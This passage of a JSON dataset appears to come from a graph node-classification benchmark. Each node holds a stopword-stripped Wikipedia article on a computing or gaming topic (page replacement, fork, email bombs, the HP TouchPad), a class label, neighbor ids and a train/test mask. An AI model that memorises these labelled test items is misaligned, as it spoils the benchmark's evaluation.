    "mask": "None"
  },
  {
    "node_id": 2247,
    "label": 0,
    "text": "Word_lists_by_frequency:word lists frequency word lists frequency lists language words grouped frequency occurrence within given text corpus either levels ranked list serving purpose vocabulary acquisition word list frequency provides rational basis making sure learners get best return vocabulary learning effort mainly intended course writers directly learners frequency lists also made lexicographical purposes serving sort checklist ensure common words left major pitfalls corpus content corpus register definition word word counting thousand years old still gigantic analysis done hand mid-20th century natural language electronic processing large corpora movie subtitles subtlex megastudy accelerated research field computational linguistics frequency list sorted list words word types together frequency frequency usually means number occurrences given corpus rank derived position list nation noted incredible help provided computing capabilities making corpus analysis much easier cited several key issues influence construction frequency lists currently available studies based written text corpus easily available easy process however proposed tap large number subtitles available online analyse large numbers speeches made long critical evaluation traditional textual analysis approach support move written corpus toward oral corpuses analysis thanks open film subtitles available online recently followed handful follow-up studies providing valuable frequency count analysis various languages indeed subtlex movement completed five years full studies french american english dutch chinese spanish greek vietnamese brazil portuguese portugal portuguese 2015 albanian polish subtlex-it 2015 provides raw data case basic word unit defined latin scripts words usually one several characters separated either spaces punctuation exceptions arise english ca n't french aujourd'hui idioms may also preferable group words word family representation base word thus possible impossible possibility words word family represented base word *possib* statistical purpose words summed base word form *possib* allowing ranking concept form occurrence moreover languages may present specific difficulties case chinese use spaces words specified chain several characters interpreted either phrase unique-character words multi-character word seems zipf law holds frequency lists drawn longer texts natural language frequency lists useful tool building electronic dictionary prerequisite wide range applications computational linguistics german linguists define häufigkeitsklasse frequency class formula_1 item list using base 2 logarithm ratio frequency frequency frequent item common item belongs frequency class 0 zero item approximately half frequent belongs class 1 example list misspelled word outragious ratio 76/3789654 belongs class 16. formula_3 floor function frequency lists together semantic networks used identify least common specialized terms replaced hypernyms process semantic compression lists intended given directly students rather serve guideline teachers textbook authors paul nation modern language teaching summary encourages first move high frequency vocabulary special purposes thematic vocabulary low frequency vocabulary teach learners strategies sustain autonomous vocabulary expansion word frequency known various effects memorization positively affected higher word frequency likely learner subject exposures lexical access positively influenced high word frequency phenomenon called word frequency effect effect word frequency related effect age-of-acquisition age word learned review available resources word counting dates back hellenistic time thorndike lorge assisted colleagues counted 18,000,000 running words provide first large scale frequency list 1944 modern computers made projects far easier suffer age particular words relating technology blog 2014 7665 frequency corpus contemporary american english first attested 1999 appear three lists twb contains 30,000 lemmas ~13,000 word families goulden nation read 1990 corpus 18 million written words hand analysed size source corpus increased usefulness age language changes reduced applicability gsl contains 2,000 headwords divided two sets 1,000 words corpus 5 million written words analyzed 1940s rate occurrence different meanings parts speech headword provided various criteria frequence range carefully applied corpus thus despite age errors corpus entirely written text still excellent database word frequency frequency meanings reduction noise list updated 2013 dr. charles browne dr. brent culligan joseph phillips new general service list corpus 5 million running words written texts used united states schools various grades various subject areas value focus school teaching materials tagging words frequency word school grade subject areas contain 1 million words written corpus representing different dialects english sources used produce frequency lists review made attempt made 1950s–60s includes f.f.1 list 1,500 high-frequency words completed later f.f.2 list 1,700 mid-frequency words used syntax rules claimed 70 grammatical words constitute 50 communicatives sentence 3,680 words make 95~98 coverage list 3,000 frequent words available french ministry education also provide ranked list 1,500 frequent word families provided lexicologue étienne brunet jean baudot made study model american brown study entitled fréquences d'utilisation des mots en français écrit contemporain recently project lexique3 provides 142,000 french words orthography phonetic syllabation part speech gender number occurrence source corpus frequency rank associated lexemes etc. available open license cc-by-sa-4.0 lexique3 continuous study originate subtlex movement cited made completely new counting based online film subtitles several studies spanish word frequency chinese corpuses long studied perspective frequency lists historical way learn chinese vocabulary based characters frequency american sinologist john defrancis mentioned importance chinese foreign language learning teaching johnny ca n't read chinese frequency toolkit da taiwanese ministry education provided large databases frequency ranks characters words hsk list 8,848 high medium frequency words people republic china republic china taiwan top list 8,600 common traditional chinese words two lists displaying common chinese words characters following subtlex movement recently made rich study chinese word character frequencies frequently used words different languages based wikipedia combined corpora 100 frequently used french words example sentences based www.opensubtitles.org",
    "neighbors": [
      1890,
      7780,
      3694,
      7599,
      10102,
      2999
    ],
    "mask": "Test"
  },
  {
    "node_id": 2248,
    "label": 2,
    "text": "Atlas_Supervisor:atlas supervisor atlas supervisor program managed allocation processing resources manchester university atlas computer machine able act many tasks user programs concurrently various functions included running atlas computer virtual memory atlas supervisor paper section 3 store organisation ‘ considered many first recognisable modern operating system ’ brinch hansen described significant breakthrough history operating systems",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      557,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      4201,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 2249,
    "label": 3,
    "text": "Ys_I:_Ancient_Ys_Vanished:ys ancient ys vanished ys vanished omens also ancient land ys first installment ys action role-playing video game series developed nihon falcom 1987 name commonly misspelled due error packaging english-language release initially developed pc-8801 masaya hashimoto director programmer designer tomoyoshi miyazaki scenario writer game soon ported x1 pc-9801 fm-7 msx2 japanese computer systems ancient ys vanished saw many subsequent releases english-language version master system enhanced remake turbografx-cd system part compilation called ys ii along 1988 sequel ys precursor rpgs emphasize storytelling hero ys adventurous young swordsman named adol christin story begins arrived town minea land esteria called upon sara fortune teller tells great evil sweeping land adol informed must seek six books ys books contain history ancient land ys give knowledge needs defeat evil forces sara gives adol crystal identification instructs find aunt zepik village holds key retrieving one books quest begins player controls adol game field viewed top-down perspective travels main field explores dungeons encounters numerous roaming enemies must battle order progress combat ys rather different rpgs time either turn-based battles manually activated sword ys instead features battle system fighters automatically attack walking enemies off-center one fighter comes contact enemy damage could sustained sides combatants facing attacking straight causes attacker damage clipping edge defender causes attacked fighter take damage one fighter contacts enemy side back attacked fighter sustain damage combat system created accessibility mind 'bump attack system become one series defining features falcom staff compared style gameplay enjoyment popping air bubble sheets sense took tedious task level-grinding turned something similar high-score-based arcade game according games john szczepaniak retro gamer escapist repetition act pleasurable developed psychological rhythm even event backtracking progress always swift since player never needed stop moving another feature used nearly every ys title since original recharging health mechanism previously used dragon slayer ys official successor clone hydlide series although hydlide borrowed feature 1980 game rogue first place recharging health since become common mechanism used many video games today aside graphical differences game layout remains essentially across many ports ys however versions details changed sega master system version example saw game dungeon areas flipped horizontally including minor differences distinctive early ports famicom edition published victor musical industries version vast departure original featuring entirely new layouts towns field dungeons replacement number original musical tracks new final battle sequence version developed msx2 contained handful new musical tracks replaced part original game soundtrack tracks along number unused tracks first composed original later incorporated soundtrack ys eternal ys complete versions developed turbografx-cd released ys ii 1989 included additional cutscenes opening detailing adol arrival town minea microsoft windows-based remakes ys eternal ys complete expand many story elements cutscenes additional gameplay sharp x68000 enhanced remake released 1991 notable early use 3d pre-rendering boss sprites however ended creating considered bizarre contrast game mostly 2d graphics composed yuzo koshiro along mieko ishikawa soundtrack notable rich melodies age video game music beginning progress monotonous bleeps ys soundtrack considered best video game music ever composed considered one finest influential role-playing video game scores time several soundtrack albums dedicated music ys released falcom includes sega master system version ys reviewed march 1989 issue computer video games magazine gave game score 92 stating best graphics system offers depth playability keep engrossed weeks games machine compared game legend zelda stating many respects character detail all-round presentation make better game visually concludes ys one top-rank rpgs around giving score 90 computer gaming world scorpia 1993 called computer version ys fairly simple entry puzzles solve ... interesting mainly seeing japanese terms lightweight crpgs japanese gaming magazine famitsu gave famicom nes version game score 30 40 famitsu also gave pce-cd turbografx-cd version score 35 40",
    "neighbors": [
      10240,
      6797,
      9166,
      6077,
      10931,
      11443,
      445
    ],
    "mask": "None"
  },
  {
    "node_id": 2250,
    "label": 2,
    "text": "Page_replacement_algorithm:page replacement algorithm computer operating system uses paging virtual memory management page replacement algorithms decide memory pages page sometimes called swap write disk page memory needs allocated page replacement happens requested page memory page fault free page used satisfy allocation either none number free pages lower threshold page selected replacement paged referenced paged read disk involves waiting i/o completion determines quality page replacement algorithm less time waiting page-ins better algorithm page replacement algorithm looks limited information accesses pages provided hardware tries guess pages replaced minimize total number page misses balancing costs primary storage processor time algorithm page replacing problem typical online problem competitive analysis perspective sense optimal deterministic algorithm known page replacement algorithms hot topic research debate 1960s 1970s mostly ended development sophisticated lru least recently used approximations working set algorithms since basic assumptions made traditional page replacement algorithms invalidated resulting revival research particular following trends behavior underlying hardware user-level software affected performance page replacement algorithms requirements page replacement algorithms changed due differences operating system kernel architectures particular modern os kernels unified virtual memory file system caches requiring page replacement algorithm select page among pages user program virtual address spaces cached files latter pages specific properties example locked write ordering requirements imposed journaling moreover goal page replacement minimize total time waiting memory take account memory requirements imposed kernel sub-systems allocate memory result page replacement modern kernels linux freebsd solaris tends work level general purpose kernel memory allocator rather higher level virtual memory subsystem replacement algorithms local global process incurs page fault local page replacement algorithm selects replacement page belongs process group processes sharing memory partition global replacement algorithm free select page memory local page replacement assumes form memory partitioning determines many pages assigned given process group processes popular forms partitioning fixed partitioning balanced set algorithms based working set model advantage local page replacement scalability process handle page faults independently leading consistent performance process however global page replacement efficient overall system basis replacement algorithms simply return target page result means target page dirty contains data written stable storage page reclaimed i/o initiated send page stable storage clean page early days virtual memory time spent cleaning much concern virtual memory first implemented systems full duplex channels stable storage cleaning customarily overlapped paging contemporary commodity hardware hand support full duplex transfers cleaning target pages becomes issue deal situation various precleaning policies implemented precleaning mechanism starts i/o dirty pages likely replaced soon idea time precleaned page actually selected replacement i/o complete page clean precleaning assumes possible identify pages replaced next precleaning eager waste i/o bandwidth writing pages manage get re-dirtied selected replacement systems use demand paging—waiting page actually requested loading ram systems attempt reduce latency guessing pages ram likely needed soon pre-loading pages ram page requested often combination pre-cleaning guesses pages currently ram likely needed soon pre-writing storage page fault occurs anticipatory paging systems bring referenced page also next consecutive pages analogous prefetch input queue cpu swap prefetch mechanism goes even loading pages even consecutive likely needed soon h k -paging problem generalization model paging problem let h k positive integers formula_1 measure performance algorithm cache size formula_1 relative theoretically optimal page replacement algorithm formula_3 provide optimal page replacement algorithm strictly less resource h k -paging problem way measure online algorithm performs comparing performance optimal algorithm specifically separately parameterizing cache size online algorithm optimal algorithm marking algorithms general class paging algorithms page associate bit called mark initially set pages unmarked stage page requests mark page first requested stage marking algorithm algorithm never pages marked page alg marking algorithm cache size k opt optimal algorithm cache size h formula_1 alg formula_5-competitive every marking algorithm attains formula_5-competitive ratio lru marking algorithm fifo marking algorithm algorithm conservative consecutive request sequence containing k fewer distinct page references algorithm incur k fewer page faults alg conservative algorithm cache size k opt optimal algorithm cache formula_1 alg formula_5-competitive every conservative algorithm attains formula_5-competitive ratio lru fifo clock conservative algorithms variety page replacement algorithms theoretically optimal page replacement algorithm also known opt clairvoyant replacement algorithm bélády optimal page replacement policy algorithm works follows page needs swapped operating system swaps page whose next use occur farthest future example page going used next 6 seconds swapped page going used within next 0.4 seconds algorithm implemented general purpose operating system impossible compute reliably long page going used except software run system either known beforehand amenable static analysis memory reference patterns class applications allowing run-time analysis despite limitation algorithms exist offer near-optimal performance — operating system keeps track pages referenced program uses data decide pages swap subsequent runs algorithm offer near-optimal performance first run program program memory reference pattern relatively consistent time runs analysis paging problem also done field online algorithms efficiency randomized online algorithms paging problem measured using amortized analysis recently used nru page replacement algorithm algorithm favours keeping pages memory recently used algorithm works following principle page referenced referenced bit set page marking referenced similarly page modified written modified bit set setting bits usually done hardware although possible software level well certain fixed time interval timer interrupt triggers clears referenced bit pages pages referenced within current timer interval marked referenced bit page needs replaced operating system divides pages four classes although seem possible page modified yet referenced happens class 3 page referenced bit cleared timer interrupt nru algorithm picks random page lowest category removal four page categories nru algorithm replace not-referenced not-modified page page exists note algorithm implies modified not-referenced within last timer interval page less important not-modified page intensely referenced nru marking algorithm formula_5-competitive simplest page-replacement algorithm fifo algorithm first-in first-out fifo page replacement algorithm low-overhead algorithm requires little bookkeeping part operating system idea obvious name – operating system keeps track pages memory queue recent arrival back oldest arrival front page needs replaced page front queue oldest page selected fifo cheap intuitive performs poorly practical application thus rarely used unmodified form algorithm experiences bélády anomaly simple words page fault frame memory longest replaced fifo page replacement algorithm used vax/vms operating system modifications partial second chance provided skipping limited number entries valid translation table references additionally pages displaced process working set systemwide pool recovered already re-used fifo conservative algorithm formula_5-competitive modified form fifo page replacement algorithm known second-chance page replacement algorithm fares relatively better fifo little cost improvement works looking front queue fifo instead immediately paging page checks see referenced bit set set page swapped otherwise referenced bit cleared page inserted back queue new page process repeated also thought circular queue pages referenced bit set second encounter first page list page swapped referenced bit cleared pages reference bit cleared second chance algorithm degenerates pure fifo name suggests second-chance gives every page second-chance – old page referenced probably use swapped new page referenced clock efficient version fifo second-chance pages n't constantly pushed back list performs general function second-chance clock algorithm keeps circular list pages memory hand iterator pointing last examined page frame list page fault occurs empty frames exist r referenced bit inspected hand location r 0 new page put place page hand points hand advanced one position otherwise r bit cleared clock hand incremented process repeated page replaced clock conservative algorithm formula_5-competitive least recently used lru page replacement algorithm though similar name nru differs fact lru keeps track page usage short period time nru looks usage last clock interval lru works idea pages heavily used past instructions likely used heavily next instructions lru provide near-optimal performance theory almost good adaptive replacement cache rather expensive implement practice implementation methods algorithm try reduce cost yet keep much performance possible expensive method linked list method uses linked list containing pages memory back list least recently used page front recently used page cost implementation lies fact items list moved every memory reference time-consuming process another method requires hardware support follows suppose hardware 64-bit counter incremented every instruction whenever page accessed acquires value equal counter time page access whenever page needs replaced operating system selects page lowest counter swaps implementation costs one may consider algorithms like follow similar lru offer cheaper implementations one important advantage lru algorithm amenable full statistical analysis proven example lru never result n-times page faults opt algorithm n proportional number pages managed pool hand lru weakness performance tends degenerate many quite common reference patterns example n pages lru pool application executing loop array n 1 pages cause page fault every access loops large arrays common much effort put modifying lru work better situations many proposed lru modifications try detect looping reference patterns switch suitable replacement algorithm like recently used mru comparison arc algorithms lru mq 2q lru-2 lrfu lirs found megiddo modha 2004 lru marking algorithm formula_5-competitive random replacement algorithm replaces random page memory eliminates overhead cost tracking page references usually fares better fifo looping memory references better lru although generally lru performs better practice os/390 uses global lru approximation falls back random replacement lru performance degenerates intel i860 processor used random replacement policy rhodehamel 1989 frequently used nfu page replacement algorithm requires counter every page one counter initially set 0 clock interval pages referenced within interval counter incremented 1 effect counters keep track frequently page used thus page lowest counter swapped necessary main problem nfu keeps track frequency use without regard time span use thus multi-pass compiler pages heavily used first pass needed second pass favoured pages comparably lightly used second pass higher frequency counters results poor performance common scenarios exist nfu perform similarly os boot-up thankfully similar better algorithm exists description follows frequently used page-replacement algorithm generates fewer page faults least recently used page replacement algorithm page table contains null pointer values aging algorithm descendant nfu algorithm modifications make aware time span use instead incrementing counters pages referenced putting equal emphasis page references regardless time reference counter page first shifted right divided 2 adding referenced bit left binary number instance page referenced bits 1,0,0,1,1,0 past 6 clock ticks referenced counter look like 10000000 01000000 00100000 10010000 11001000 01100100 page references closer present time impact page references long ago ensures pages referenced recently though less frequently referenced higher priority pages frequently referenced past thus page needs swapped page lowest counter chosen following python code simulates aging algorithm counters formula_14 initialized formula_15 updated described via formula_16 using arithmetic shift operators def simulateaging rs k rs 1,0,1,0,1,1 1,1,0,0,1,0 1,1,0,1,0,1 1,0,0,0,1,0 0,1,1,0,0,0 k 8 simulateaging rs k given example r-bits 6 pages 5 clock ticks function prints following output lists r-bits clock tick formula_17 individual counter values formula_14 page binary representation note aging differs lru sense aging keep track references latest 16/32 depending bit size processor integers time intervals consequently two pages may referenced counters 00000000 even though one page referenced 9 intervals ago 1000 intervals ago generally speaking knowing usage within past 16 intervals sufficient making good decision page swap thus aging offer near-optimal performance moderate price basic idea behind algorithm locality reference used lru difference ldf locality based distance used references ldf replace page longest distance current page two pages distance page next current page anti-clock rotation get replaced many techniques discussed assume presence reference bit associated page hardware bit efficient use requires techniques operate well without one one notable example vax hardware running openvms system knows page modified necessarily page read approach known secondary page caching pages removed working sets process-private memory generally placed special-purpose lists remaining physical memory time removing page working set technically page-replacement operation effectively identifies page candidate page whose backing store still valid whose contents dirty otherwise need preserved placed tail free page list page requires writing backing store placed modified page list actions typically triggered size free page list falls adjustable threshold pages may selected working set removal essentially random fashion expectation poor choice made future reference may retrieve page free modified list removed physical memory page referenced way removed free modified list placed back process working set modified page list additionally provides opportunity write pages backing store groups one page increasing efficiency pages placed free page list sequence pages works way head free page list resembles results lru nru mechanism overall effect similarities second-chance algorithm described earlier another example used linux kernel arm lack hardware functionality made providing two page tables – processor-native page tables neither referenced bits dirty bits software-maintained page tables required bits present emulated bits software-maintained table set page faults order get page faults clearing emulated bits second table revokes access rights corresponding page implemented altering native table working set process set pages expected used process time interval working set model n't page replacement algorithm strict sense actually kind medium-term scheduler",
    "neighbors": [
      2304,
      3725,
      11539,
      3615,
      2473,
      7983,
      823,
      8379,
      4928,
      2625,
      2250,
      5967,
      5840,
      9300,
      11604,
      86,
      10843,
      1385,
      8554,
      9964,
      9335,
      2172,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 2251,
    "label": 4,
    "text": "Email_bomb:email bomb internet usage email bomb form net abuse consisting sending large volumes email address attempt overflow mailbox overwhelm server email address hosted denial-of-service attack dos attack smoke screen distract attention important email messages indicating security breach three methods perpetrating email bomb mass mailing list linking zip bombing mass mailing consists sending numerous duplicate mails email address types mail bombs simple design extreme simplicity means easily detected spam filters email-bombing using mass mailing also commonly performed ddos attack employing use zombie botnets hierarchical networks computers compromised malware attacker control similar use spamming attacker instructs botnet send millions even billions emails unlike normal botnet spamming emails addressed one addresses attacker wishes flood form email bombing similar purpose ddos flooding attacks targets frequently dedicated hosts handling website email accounts business type attack devastating services host type attack difficult defend simple mass-mailing bomb multiple source addresses possibility zombie computer sending different message employing stealth techniques defeat spam filters list linking also known email cluster bomb means signing particular email address several email list subscriptions victim unsubscribe unwanted services manually attack carried automatically simple scripts easy almost impossible trace back perpetrator potentially destructive massive attack kind targeting .gov email addresses observed august 2016 order prevent type bombing email subscription services send confirmation email person inbox email used register subscription however even confirmation emails contribute attack better defense would prevent web sites exploited without abandoning subscription forms subscription form filled web site would dynamically create mailto link legitimate user would send message validate request without receiving email web site sender email could spoofed sender smtp ip address list manager therefore verify email form request matches originating smtp server validation message large amount confirmation emails initiated registration bots signing specific email address multitude services used distract view important emails indicating security breach happened elsewhere example amazon account hacked hacker may contrive flood confirmation emails sent email address associated account mask fact amazon shipment address changed purchases made hacker zip bomb variant mail-bombing commercial mail servers began checking mail anti-virus software filtering certain malicious file types exe rar zip 7-zip mail server software configured unpack archives check contents well new idea combat solution composing bomb consisting enormous text file containing example letter z repeating millions times file compresses relatively small archive unpacking especially early versions mail servers would use greater amount processing could result denial service zip .tar.gz file even contain copy causing infinite recursion server checks nested archive files text bomb similar variant sending large number text messages sms technique means cyberbullying online harassment apps online android operating system since banned means sending text bombs text messages may also lead high phone bill charges mobile plans additionally certain phone apps also created prevent text bombs android os",
    "neighbors": [
      8768,
      9953,
      2213,
      2409,
      855,
      7515,
      9053,
      10110
    ],
    "mask": "Test"
  },
  {
    "node_id": 2252,
    "label": 4,
    "text": "Gateway_Anti-Virus:gateway anti-virus gateway anti-virus allows applications across enterprise check files viruses providing soap-based virus scanning web service client applications attach files soap messages submit gateway anti-virus web service web service uses clamav scan attachments viruses returns results client",
    "neighbors": [
      11363,
      10020,
      2213,
      7983,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2253,
    "label": 3,
    "text": "Fork_(system_call):fork system call computing particularly context unix operating system workalikes fork operation whereby process creates copy usually system call implemented kernel fork primary historically method process creation unix-like operating systems multitasking operating systems processes running programs need way create new processes e.g run programs fork variants typically way unix-like systems process start execution different program first forks create copy copy called child process calls exec system call overlay program ceases execution former program favor fork operation creates separate address space child child process exact copy memory segments parent process modern unix variants follow virtual memory model sunos-4.0 copy-on-write semantics implemented physical memory need actually copied instead virtual memory pages processes may refer pages physical memory one writes page copied optimization important common case fork used conjunction exec execute new program typically child process performs small set actions ceases execution program favour program started requires parent data structures process calls fork deemed parent process newly created process child fork processes run program resume execution though called system call inspect call return value determine status child parent act accordingly one earliest references fork concept appeared multiprocessor system design melvin conway published 1962 conway paper motivated implementation l. peter deutsch fork genie time-sharing system concept borrowed ken thompson earliest appearance research unix fork later became standard interface posix child process starts copy parent file descriptors interprocess communication parent process often create pipe several pipes forking processes close ends pipes n't need vfork variant fork calling convention much semantics used restricted situations originated 3bsd version unix first unix support virtual memory standardized posix permitted vfork exactly behavior fork marked obsolescent 2004 edition replaced posix_spawn typically implemented via vfork subsequent editions vfork system call issued parent process suspended child process either completed execution replaced new executable image via one exec family system calls child borrows mmu setup parent memory pages shared among parent child process copying done particular copy-on-write semantics hence child process makes modification shared pages new page created modified pages visible parent process since absolutely page copying involved consuming additional memory technique optimization plain fork full-copy environments used exec posix using vfork purpose except prelude immediate call function exec family select operations gives rise undefined behavior vfork child borrows data structures rather copying vfork still faster fork uses copy write semantics system v support function call system vr4 introduced memory sharing causes error-prone similarly linux man page vfork strongly discourages use problems include deadlocks might occur multi-threaded programs due interactions dynamic linking replacement interface posix introduced family functions combine actions fork exec functions may implemented library routines terms done linux terms better performance done solaris posix specification notes designed kernel operations especially operating systems running constrained hardware real-time systems 4.4bsd implementation got rid vfork implementation causing vfork behavior fork later reinstated netbsd operating system performance reasons embedded operating systems uclinux omit fork implement vfork need operate devices copy-on-write impossible implement due lack mmu plan 9 operating system created designers unix includes fork also variant called rfork permits fine-grained sharing resources parent child processes including address space except stack segment unique process environment variables filesystem namespace makes unified interface creation processes threads within freebsd irix adopted rfork system call plan 9 latter renaming sproc clone system call linux kernel creates child process may share parts execution context parent like freebsd rfork irix sproc linux clone inspired plan 9 rfork used implement threads though application programmers typically use higher-level interface pthreads implemented top clone separate stacks feature plan 9 irix omitted according linus torvalds causes much overhead original design vms operating system 1977 copy operation subsequent mutation content specific addresses new process forking considered risky errors current process state may copied child process metaphor process spawning used component memory layout new process newly constructed scratch spawn metaphor later adopted microsoft operating systems 1993 posix-compatibility component vm/cms openextensions provides limited implementation fork parent suspended child executes child parent share address space essentially vfork labelled fork note applies cms guest operating system vm guest operating systems linux provide standard fork functionality following variant hello world program demonstrates mechanics system call c programming language program forks two processes deciding functionality perform based return value fork system call boilerplate code header inclusions omitted follows dissection program first statement calls system call split execution two processes return value recorded variable type posix type process identifiers pids minus one indicates error new process created error message printed successful two processes executing function point returned make processes perform different tasks program must branch return value determine whether executing child process parent process child process return value appears zero invalid process identifier child process prints desired greeting message exits technical reasons posix function must used instead c standard function process parent receives process identifier child always positive number parent process passes identifier system call suspend execution child exited happened parent resumes execution exits means statement",
    "neighbors": [
      5120,
      8975,
      11539,
      5397,
      8344,
      6813,
      3746,
      7847,
      10796,
      5040,
      2995,
      7347,
      823,
      9151,
      9153,
      8773,
      4423,
      6352,
      10835,
      213,
      11351,
      5598,
      6369,
      8293,
      4968,
      7018,
      5492,
      5748,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2254,
    "label": 7,
    "text": "Moab_Cluster_Suite:moab cluster suite moab cluster suite cluster workload management package available adaptive computing inc. integrates scheduling managing monitoring reporting cluster workloads moab cluster suite simplifies unifies management across one multiple hardware operating system storage network license resource manager environments moab development based open source maui cluster scheduler job scheduling package maui associated maui scheduler molokini edition developed project sourceforge site independent original maui scheduler moab feature set expanded greatly since divergence maui many new capabilities comparison list available adaptive computing enterprises inc. site",
    "neighbors": [
      3449
    ],
    "mask": "Test"
  },
  {
    "node_id": 2255,
    "label": 2,
    "text": "Kernel_marker:kernel marker kernel markers static kernel instrumentation support mechanism linux kernel source code allowing special tools lttng systemtap trace information exposed probe points kernel markers declared kernel code one-liners form name marker unique name format_string describes remaining arguments types marker depending whether probe connected code wants hook trace point first calls register probe callback marker point pdata private data value code wants pass probe later probe turned using using markers negligible overhead thanks part immediate values another support mechanism embeds switches code dynamically turned without using memory reference thus saving cache lines initial motivation create static instrumentation infrastructure large performance overhead induced predating dynamic instrumentation mechanism kprobe mechanism depends breakpoints static instrumentation also easily survive source code changes markers source code kernel markers consisted essentially c preprocessing macro added instrumented function branch function call neither stack setup function call executed instrumentation enabled identifying branch executing stack setup function call unlikely using gcc built-in expect hint given compiler position tracing instructions away cache lines involved standard kernel execution two kernel markers drawbacks identified led replacement tracepoints patch-set implementing merged version 2.6.24 released january 24 2008 address issues regarding kernel markers mathieu desnoyers original author implemented simpler type-safe version static probe points named tracepoints patch-set implementing tracepoints merged version 2.6.28 released december 25 2008 starting kernel markers slowly removed kernel sources eventually fully removed linux kernel 2.6.32 released december 3 2009",
    "neighbors": [
      1952,
      5222,
      6988,
      5040,
      2045,
      9374
    ],
    "mask": "Test"
  },
  {
    "node_id": 2256,
    "label": 9,
    "text": "LR-attributed_grammar:lr-attributed grammar lr-attributed grammars special type attribute grammars allow attributes evaluated lr parsing result attribute evaluation lr-attributed grammars incorporated conveniently bottom-up parsing zyacc based lr-attributed grammars subset l-attributed grammars attributes evaluated one left-to-right traversal abstract syntax tree superset s-attributed grammars allow synthesized attributes yacc common hack use global variables simulate kind inherited attributes thus lr-attribution",
    "neighbors": [
      2144,
      7634,
      2307,
      2086
    ],
    "mask": "Test"
  },
  {
    "node_id": 2257,
    "label": 4,
    "text": "Spy_Sweeper:spy sweeper spy sweeper software product detects removes spyware viruses optional anti-virus component installed personal computers microsoft windows webroot software webroot discontinued support spy sweeper 12/31/2012 spy sweeper examines files computer hard disk drive well objects memory windows registry cookies quarantines suspicious objects finds normally purchased yearly subscription broadband services msn premium also offer rebranded versions spy sweeper part subscription webroot offers two versions spy sweeper zero-cost 'spy scan offering real-time protection spyware full version allows removal spyware licenses full version cost around us 30 used one year one computer 40 two years webroot also sells multiple-license subscriptions allowing users install product multiple computers using single subscription purchasing either single-user three-machine enterprise licenses kevin thomas identical twin brother steven thomas founder webroot software invented idea spy sweeper behind scenes kevin thomas richard koontz webroots ace programmer worked hard developing spy sweeper despite odds ceo time david moll richard working home hours finished spy sweeper initial version finally released september 2004 time neither kevin thomas richard koontz ever received credit invention spy sweeper october 2006 webroot released spy sweeper antivirus includes removal protection computer viruses anti-virus component based anti-virus product made software vendor sophos june 2007 version 5.5 released included ability scan email attachments improved user interface windows 2000 users upgrade v5.5 october 2008 version 6.0 released product many awards press first anti-spyware product receive checkmark certification testing company west coast labs also received editor choice award pc magazine best buy award pc world spy sweeper known webroot secure anywhere",
    "neighbors": [
      10496,
      6797,
      7983,
      9713,
      8724,
      9055,
      4247,
      10392,
      7739,
      3739,
      8703
    ],
    "mask": "None"
  },
  {
    "node_id": 2258,
    "label": 2,
    "text": "HP_TouchPad:hp touchpad hp touchpad tablet computer developed designed hewlett-packard hp touchpad launched july 1 2011 united states july 15 canada united kingdom france germany august 15 australia august 18 2011 49 days touchpad launched united states hp announced would discontinue current devices running webos remaining touchpad stock received substantial price reductions quickly sold hp touchpad announced february 9 2011 webos think beyond event held fort mason center san francisco alongside hp veer hp pre 3 initial sales device sold 25,000 270,000 units meet hp expectations rapidly becoming overshadowed launch ipad 2 march august 16 2011 reported best buy refused pay hp touchpad stock europe touchpad estimated sold 12,000 first month release australia harvey norman exclusive retailer sold 1,200 units four days sale industry commentators suggested lack apps platform lackluster advertising hindering sales august 18 hp announced would discontinue webos devices hp cto shane robison noted touchpad half generation generation behind ipad n't going drive volume years later member development team described device made cast-off reject ipad parts august 19 2011 hp announced substantial price drop touchpad canada usa price 99 16gb model 149 32gb model quickly sold large numbers buyers acquired touchpad firesale prices brick-and-mortar retailers reportedly sold entire inventories within hours morning august 20 online retailers including barnes noble amazon.com best buy took orders august 22 rapidly exceeded inventory forced cancel many orders similar sale held australian harvey norman stores several stores selling inventory within hour similar sales took place uk several stores reducing prices £89 16gb £115 32gb hp touchpad became tablet highest approval rating hp touchpad stock immediately sold domestically overseas consumers rushing take advantage price promotion following successful sale clear component suppliers inventories touch panels batteries chassis hp announced august 30 would make another production run touchpad units used fulfill existing orders businesses like tiger direct best buy bundles set price 249.99 299.99 following meg whitman appointment ceo hp conjunction announcement company plans continue developing webos open-source operating system said company would continue using os devices specifically resuming use tablets said would happen 2012 would probably take place 2013 february 2013 hp sold source code transferred remaining webos team lg effectively ending webos deployment tablets consumer products hp touchpad touchscreen tablet runs hp webos several notable features touchpad uses card multitasking found palm pre phones integrated webcam front hp touchpad enables video conferencing backlit home button bottom hp touchpad also allows haptic feedback vibration function hardware includes arm-based qualcomm snapdragon processor 1gb ram touch share allows pre 3 mobile share information websites touching sensors touchpad sensors touchpad receive calls text messages forwarded phone using palm profile well make receive calls via skype application independent site estimated 16gb 32gb hp touchpad contained 296.15 318.15 materials respectively cost assemble 10 hp touchpad 9.7 inch 1024×768 pixel gorilla glass multitouch capacitive touch screen interaction finger capacitive stylus available separate purchase touchpad virtual keyboard configured one four preset sizes number row top common qwerty layout touchpad also features invensense 3-axis gyroscope touchpad three separate physical buttons sleep/wake button top right home button bottom front launches card view app launcher set volume rockers right device holding power button home button together creates screen snapshot touchpad stereo speakers feature beats audio atheros ar6003 chipset supports dual band 2.4 ghz 5 ghz wi-fi 802.11a/b/g/n bluetooth 2.1 edr a2dp stereo bluetooth tablet share urls phone calls text messages webos phones via bluetooth pairing pairing non-webos smartphones enabled software update 3.0.4 touchpad uses rechargeable 6000 6300 mah lithium-ion polymer battery rated 3,7 v total 22,2 wh charged via microusb connector optional wireless charging touchstone charger using touchstone touchpad enters mode called exhibition mode displays simple information clock schedule media battery life estimated nine hours hp review engadget battery lasted eight half hours july 2011 hp announced webos hardware roadmap included hp 